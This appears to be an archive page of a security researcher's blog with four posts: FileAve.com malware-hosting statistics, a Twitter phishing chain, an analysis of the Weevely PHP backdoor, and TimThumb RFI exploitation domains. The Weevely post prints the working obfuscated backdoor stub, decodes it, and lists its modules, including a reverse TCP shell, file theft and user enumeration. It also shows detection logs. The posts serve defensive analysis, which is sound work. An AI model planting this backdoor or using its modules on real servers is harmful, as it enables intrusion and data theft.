Category Archives: Various

In Memory of FileAve.com Botnet

Security visualization, Various

Good news for every one, FileAve.com is finally down since the 18 October ! In July 2010 I have written a blog post on FileAve.com a free file hosting provider notorious for spreading thousands of malwares. FileAve.com have provide 50 MB free storage and a free sub domain for each created account (ex : http://yourname.fileave.com). FileAve.com was owned and operated by “Ripside Interactive, Inc.“, located in US, and more precisely by “Smith, Scott“, since September 2008. “Ripside Interactive, Inc.” was also owner of ripway.com, another notorious malware hoster.

FileAve.com is present in Clean MX database since the 2007-11-30, in Malc0de database since the 2010-01-11 and in our database since the 2009-02-16.

With the data’s contained in our Honeynet database, I can provide you the following statistics. FileAve.com and associated subdomains were linked to 94 other malware spreaders, but FileAve.com was the most important malware spreader in this botnet. These 95 malware spreaders were regularly contacted, by 1420 other source IP addresses, but not known for hosting malwares, in order to attempt to infect new potential vulnerable web servers or computers.

The median lifetime of the 95 malware spreaders were 5 days, with 6 of them how have a lifetime above 1 year, and 2 of the 6 with a lifetime above 2 years. On the 1420 other source IP addresses, 754 of them were directly connected to FileAve.com IP address.

43 of the malware spreaders were located in South Korea and 32 others were located in US. 837 distinct source IP addresses have contact the malware spreaders located in US and 309 others have contact malware spreaders located in South Korea.

The malware spreaders hosting country how has taken the longest time to shut down the malware spreaders is France, with only 2 malware spreaders located in this country but with an average lifetime of 184 days. The second country is China with 2 malware spreaders and with an average lifetime of 164 days. The third country is Thailand with 2 malware spreaders and with an average lifetime of 127 days. The fourth country is South Korea with 43 malware spreaders and with an average lifetime of 105 days.

FileAve.com botnet golden age have occur between March 2010 and September 2010, with the most active malware spreaders ratio, with the most source IP addresses and the most generated events.

If you are interested in more statistics about FileAve.com activities, I have written an PDF available here. Also I have create a geographic time map of all activities generated by the FileAve.com botnet.

Twitter Phishing “Bad blog going around about you, heard or seen it yet?”

Various,

I received an unusual private message “Bad blog going around about you, heard or seen it yet?” from one of my followers. Unfortunately my follower fell into a traditional Twitter phishing and his account is surely now compromised.

As you can see in the screenshot the link point to “http://airtar.ru“, a domain name registered since the 2011-10-13 by “[email protected]“. The web site is hosted on 111.123.180.39 in AS4134 ChinaNet GuiZhou Province and the hosting web server redirect you directly on “http://www.twittelr.com/r/“.

HTTP/1.1 301 Moved Permanently
Server: nginx/1.0.6
Date: Sun, 16 Oct 2011 18:48:24 GMT
Content-Type: text/html
Content-Length: 184
Connection: keep-alive
Location: http://www.twittelr.com/r/
P3P: CP="CAO COR CURa ADMa DEVa OUR IND ONL COM DEM PRE"

twittelr.com” domain name is registered since the 2011-09-23 by “yu zhang [email protected]“. The web site is hosted on 220.164.140.252 in AS4134 China Telecom Yunnan Province. Some funny host name are hosted on the same name server than “twittelr.com“, like “xn--fiqs8s13n4ywnyd.net“.

Accessing “http://www.twittelr.com/r/” will redirect you to “http://www.twittelr.com/timed_out_session-/“.

<meta http-equiv="refresh" content="0; URL=/timed_out_session-/">

You will see this phishing page how is quiet good in term of design.

If you provide your login and password the form will post all your informations on “http://www.twittelr.com/app/login2.php” and then redirect you to “http://www.twittelr.com/status/error/” page, but it is to late.

If you access directly on the root directory of “twittelr.com” you will observe an chinese under-construction page 🙂

Weevely Stealth Tiny PHP Backdoor Analysis

Various

@adulau has sent a tweet about a stealth tiny PHP backdoor named Weevely how is pretending to be unobtrusive and not detectable by NIDS, anti-viruses and log review activity. Weevely simulate a telnet-like session, if you communicate with the backdoor through HTTP, or ssh-like session, if you communicate with the backdoor through HTTPS.

Weevely is a python program how will permit you to generate a “server” PHP code in order to trojanize a Web server and take control of it. After a successful application Web attack exploitation, through for examples, RFI, LFI or MySQL LOAD INFILE, you only need to upload the “server” PHP code on the target, and your local Weevely python script will use the “server” PHP code in order to transmit orders.

All commands are sent through hidden datas in HTTP referrers and these commands are using dynamic probe of system-like functions to bypass PHP security restrictions. Weevely try to bypass PHP configurations that disable sensible functions who execute external programs, enabled with the disable functions option located in php.ini.

Weevely Server Code Analysis & Fingerprinting

The “server” PHP code look like this:

<?php eval(base64_decode('aW5pX3NldCgnZXJyb3JfbG9nJywgJy9kZXYvbnVsbCcpO3BhcnNlX3N0cigkX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ10sJGEpO2lmKHJlc2V0KCRhKT09J215JyAmJiBjb3VudCgkYSk9PTkpIHtlY2hvICc8cGFzc3dvcmQ+JztldmFsKGJhc2U2NF9kZWNvZGUoc3RyX3JlcGxhY2UoIiAiLCAiKyIsIGpvaW4oYXJyYXlfc2xpY2UoJGEsY291bnQoJGEpLTMpKSkpKTtlY2hvICc8L3Bhc3N3b3JkPic7fQ==')); ?>

As you see the code is obfuscated in base64 and the result of the deobfuscation is:

ini_set('error_log', '/dev/null');parse_str($_SERVER['HTTP_REFERER'],$a);if(reset($a)=='my' && count($a)==9) {echo '<password>';eval(base64_decode(str_replace(" ", "+", join(array_slice($a,count($a)-3)))));echo '</password>';}

The script is forcing PHP to send the script error to “/dev/null“, parse the HTTP referrer and decode the commands with the provided password.

If you test the “server” code on Virustotal, only 1 on 43 anti-viruses is detecting the code as a malware. But the code obfuscation method is basic and the code is only encoded 1 time. Surely in a near future most of the anti-viruses will detect it.

Actually most of common PHP backdoors, like c99, STUNSHELL, etc., embed the complete malware code and obfuscate the code with basic methods. The HTTP referrer Weevely approach is quiet interesting and new, the code is no more embedded but dynamic.

But some common PHP backdoors are now obfuscated with more complex methods, like “gzinflate(str_rot13(base64_decode(‘malware’)))” and encoded more than 10 times. These codes are only detected by few anti-viruses, like this one on Virustotal.

On the Web server side, when a Weevely command is sent to the “server” PHP code you will see this typical kind of logs in your access.log file.

192.168.178.25 - - [11/Oct/2011:00:44:25 +0200] "GET /mybb/readme.php HTTP/1.0" 200 237 "http://www.google.com/url?sa=my&source=web&ct=7&url=http%3A//blackbox.zataz.loc/mybb/readme.php&rct=j&q=mybb readme&ei=ZWNob&usg=yA1Nz&sig2=ExNjs=" "Python-urllib/1.17, Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"

You can see that the HTTP referrer is google.com and that the command is encoded. If you compare Weevely HTTP referrer to a normal google.com HTTP referrer, here under, you can see that they are really few differences. It is clearly impossible to distinguish a valid HTTP referrer with a forged one.

xxx.xxx.xxx.xxx - - [11/Sep/2011:20:45:52 +0200] "GET /2011/02/06/cve-2010-3867-proftpd-iac-remote-root-exploit/ HTTP/1.1" 200 11751 "http://www.google.com/url?sa=t&source=web&cd=12&ved=0CB8QFjABOAo&url=http%3A%2F%2Feromang.zataz.com%2F2011%2F02%2F06%2Fcve-2010-3867-proftpd-iac-remote-root-exploit%2F&rct=j&q=proftpd%20IAC%20Buffer%20Overflow&ei=2wFtTt6jHMjd4QS8iunYBA&usg=AFQjCNHZ_21-rBnWO0Hu3YgMYub6dE7oqA&sig2=fHqAoyj7khMooGBCTuuqyw" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1"

Unfortunately for Weevely authors the Python User Agent is recognized by basic NIDS rules like Emerging Threats (SIG 2013031).

Oct 11 22:31:27 fw3 snort[4069]: [1:2013031:1] ET POLICY Python-urllib/ Suspicious User Agent [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.178.25:54037 -> 192.168.178.61:80

Also unfortunately for Weevely authors, if you have PHP safe_mode enabled, you will also have this typical kind of logs in you error.log file. A regular Log review activity will detect this kind of errors.

[Tue Oct 11 00:44:25 2011] [error] [client 192.168.178.25] PHP Warning:  ini_set(): SAFE MODE Restriction in effect.  The script whose uid is 33 is not allowed to access /dev/null owned by uid 0 in /var/www/mybb/readm
e.php(1) : eval()'d code on line 1, referer: http://www.google.com/url?sa=my&source=web&ct=7&url=http%3A//blackbox.zataz.loc/mybb/readme.php&rct=j&q=mybb readme&ei=ZWNob&usg=yA1Nz&sig2=ExNjs=

The actual Weevely version is identifiable by NIDS through the User Agent or by regular Log review activity, but clearly the approach is really interesting and future version

Weevely Usage

  • Invoke Weevely help

To invoke Weevely help you only need to execute the following command :

  • Weevely server code generation

To generate the “server” code you only need to execute the following command, where “mypassword” is you desired password and “readme.php” the backdoor PHP file how need to be uploaded on the target Web server.

  • Start a telnet or ssh like session and exploitation

To start a telnet-like (HTTP) or ssh-like (HTTPS) session you only need to execute the following command :

As you see in the screenshot the interpreter is “shell.sh” how allow you to execute shell commands. The other interpreter is “shell.php” how will allow you to execute PHP commands. You can also invoque the backdoor help with the “:help” command. Here under the list of modules with they’re methods.

[backdoor] [reverse_tcp] Send reverse shell using TCP socket
           :backdoor.reverse_tcp ip port

[/shell]
[sh] Execute system commands
        :shell.sh ""

[/php]
 Execute single PHP commands
        :shell.php ";"

[find] [perms] Find files with write, read, execute permissions
       :find.perms first|all file|dir|all w|r|x|all 

       [webdir] Find writable directory and get corresponding URL
       :find.webdir

       [suidsgid] Find suid, sgid, or every file with superuser flag
       :find.suidsgid suid|sgid|all 

       [binaries] Find executables in common PATH folders
       :find.binaries all | 

       [name] Find files with name that match string
       (e=equal, ei= equal case insensitive , c= contains, ci= contains case insensitive)
       :find.name e|ei|c|ci  

[file] [read] Read file outside web root using different techniques
       :file.read 

       [download] Download remote binary/ascii files
       :file.download  

       [upload] Upload local binary/ascii file using POST method
       :file.upload  

       [check] Check remote files presence, type, md5 and permissions
       :file.check  exists|file|dir|md5|r|w|x

[system] [info] Collect system informations
         :system.info all|whoami|hostname|basedir|document_root

         [users] Enumerate system users using different techniques
         :system.users

WordPress TimThumb RFI Vulnerability used as Botnet Recruitment Vector

Various, ,

On thirst August 2011, Mark Maunder had reveal, through a defacement experience, that “timthumb.php” script, included in hundreds of WordPress themes, was vulnerable to remote file inclusion (RFI) attack. TimThumb is small php script for cropping, zooming and resizing web images (jpg, png, gif).

The default configuration of “timthumb.php” script, in many WordPress themes, allow remote file inclusion from the following domains:

  • flickr.com
  • picasa.com
  • blogger.com
  • wordpress.com
  • img.youtube.com
  • upload.wikimedia.org
  • photobucket.com

Unfortunately the domain code verification was buggy, allowing remote file inclusion if the above domain strings appears anywhere in the hostname, for example : picasa.com.zataz.com.

To create such DNS entries you need to have control on a zone hosted by a DNS server, the attack vector is more complex than a simple RFI attack how don’t need this kind of resource.

Since few weeks, I observe through my Honeynet that attempts to exploit this vulnerability are increasing and that it is now fully integrated as dork into the ByroeNet like tools. The fact is that more and more exploitable DNS entries are created how allow the TimThumb vulnerability exploitation.

For example, one of the most active TimThumb vulnerability domain is actually “picasa.com.xpl.be“, how has the following details :

  • RFI IP : 98.158.186.250
  • RFI FQDN : 90.158.186.250.static.midphase.com
  • RFI Country : United States

Domain name servers authority for “picasa.com.xpl.be” and “xpl.be” domain names are :

; AUTHORITY SECTION:
xpl.be.			81644	IN	NS	ns2.afraid.org.
xpl.be.			81644	IN	NS	ns3.afraid.org.
xpl.be.			81644	IN	NS	ns1.afraid.org.
xpl.be.			81644	IN	NS	ns4.afraid.org.

;; ADDITIONAL SECTION:
ns1.afraid.org.		508	IN	A	67.19.72.206
ns2.afraid.org.		206	IN	A	174.37.196.55
ns3.afraid.org.		26	IN	A	72.20.15.61
ns4.afraid.org.		26	IN	A	174.128.246.102

afraid.org is a free DNS hosting, dynamic DNS hosting, static DNS hosting, subdomain and domain hosting services provider.

xpl.be domain name has been registered, the 5 April 2010, through Key-Systems GmbH a german domain name registrar and the registration informations are :

Registrant
Name : Dolores Aleman
Organisation : Dolores Aleman
Address : 1014 south 2nd st - 78550 Harlingen AL US
Email : [email protected]

Registrant technical contacts
Name : Mr XpL
Organisation : XpL inc
Address : 1014 south 2nd st - 78550 Harlingen AL US
Email : [email protected]

Both “picasa.com.xpl.be” and “xpl.be” are hosted on IP 98.158.186.250 from midPhase.com a hosting service provider, but this hosting service provider doesn’t provide any free hosting services. Also as you can see below the xpl.be web site designer know ASCII art.

Other example is “picasa.compress.cu.cc“, registered on “cu.cc” the 13 September 2011 by “[email protected]“. the domain name and website are hosted on 50Webs.com a free DNS and hosting provider.

picasa.computergoogle.co.cc“, registered on “co.cc” registrar the 22 September 2011 by “[email protected]“. The domain name and website are hosted on 50Webs.com a free DNS and hosting provider.

wordpress.com.daliacarella.com“, registered on “www.000domains.com” the 17 July 2011 by “[email protected]”. The domain name and the website are hosted on HostDime.com.

blogger.com.donshieldphotography.com“, registered on Visual Solutions Group Inc the 19 January 2011 by “Don Shield Photography“. The domain name and the website are hosted on Visual Solutions Group Inc. “www.donshieldphotography.com” seem to be a legitimate Web site, but Visual Solutions Group Inc infrastructure seem also compromised.

blogger.com.aptum.nu“, registered on nunames.nu the 24 October 2006 by “[email protected]”. The domain name and the website are hosted on ODERLAND. “aptum.nu” seem to be a legitimate Web site.

blogger.com.jewelhost.co.uk” registered on 123-reg.co.uk the 04 May 2010 by “Callum Baillie”. The domain name and the website are hosted on JewelHost.co.uk a hosting provider how seem to be compromised.

blogger.com.tara-baker.com” registered on Tucows Domains the 07 January 2010 by “UK2.net”. The domain name and the website are hosted on VC-Hosting.com a hosting provider how seem to be compromised.

picasa.com.marcialia.com.br” has his domain name and website hosted on SERVER4YOU a hosting provider how propose free hosting trial during 6 months.marcialia.com.br seem to be a legitimate web site, the account seem to be compromised.

Other domains how are also participating to the TimThumb Botnet : “picasa.com.crimecyber.tk“, “blogger.com.1h.hu“, “picasa.com.nixonmu.com“, “blogger.com.lionsurveys.com“, “blogger.com.autoelectricahernandez.com“.

You have also “picasa.com.throngbook.com“, “blogger.com.cursos.secundariatecnica33.org”  how are actually down.

All these compromised sites seem to be related to the Indonesian Byroe.net network.

Here under you can find some live stats on the TimThumb vulnerability exploitation attempts detected by our Honeynet.